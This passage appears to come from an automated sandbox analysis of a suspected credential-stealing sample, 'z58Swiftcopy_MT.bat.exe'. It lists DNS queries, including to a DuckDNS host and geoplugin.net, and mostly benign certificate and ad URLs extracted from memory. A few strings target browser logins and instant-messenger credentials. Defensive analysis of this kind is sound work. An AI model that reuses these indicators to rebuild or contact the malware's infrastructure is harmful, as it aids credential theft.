ptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prom
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32066847956.0000000033950000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32066847956.0000000033950000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: teldrum.ro
                  Source: global trafficDNS traffic detected: DNS query: wealthabundance01.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://c.pki.goog/r/r1.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://c.pki.goog/wr2/9UVbN0w5E6Y.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://certificates.godaddy.com/repository/0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://certs.godaddy.com/repository/1301
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://contentstorage.osi.office.net/
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28340161307.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28340161307.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: http://geoplugin.net/json.gp
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp=N
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpCn
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpXN
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://i.pki.goog/r1.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://i.pki.goog/wr2.crt0
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
                  Source: z58Swiftcopy_MT.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                  Source: z58Swiftcopy_MT.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://o.pki.goog/wr20%
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://o.ss2.us/0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0B
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0F
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0G
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0H
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0I
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0K
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0M
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.godaddy.com/0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.godaddy.com/02
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.godaddy.com/05
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp.sectigo.com0%
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://ocspx.digicert.com0E
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://s.ss2.us/r.crl0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://status.geotrust.com0=
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://status.thawte.com09
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0u
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0v
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0~
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000626000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000005.00000003.28455900413.0000000000AFD000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000003.28455853934.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456329037.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/
                  Source: z58Swiftcopy_MT.bat.exe, 00000005.00000003.28455900413.0000000000AFD000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000003.28455853934.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32067121242.0000000033A40000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32067121242.0000000033A40000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481442526.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28340161307.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                  Source: bhvD739.tmp.3.drString found in binary or memory: http://x.ss2.us/x.cer0&
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.000000000228D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476475209.000000000228D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://99c8cba043b829a5adbf3c95c1c0a87a.azr.footprintdns.com/apc/trans.gif?b463cc9221b0d1cf6b255213
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://99c8cba043b829a5adbf3c95c1c0a87a.azr.footprintdns.com/apc/trans.gif?d61d17a32b075ad284d0798e
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5Q
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRi
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_Gray_X-qkgtg8KmnQEvm_9mDTcw2.svg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/favicon.ico
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&conn
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/accountcorepackage_hSxsZy9Ymkhjr2rMMwej_g2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapcomponentshim_yGKy8jAx8RL2bLqmBF063w2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/bootstrapshim_IX6xrWCoGcREOsbbsQ1Yvg2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/confirmidentity_9m6e3jBPkyZiRdJxglsYsA2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/corewin10_Lmno_4TyJLm7Xee3gF3aOg2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
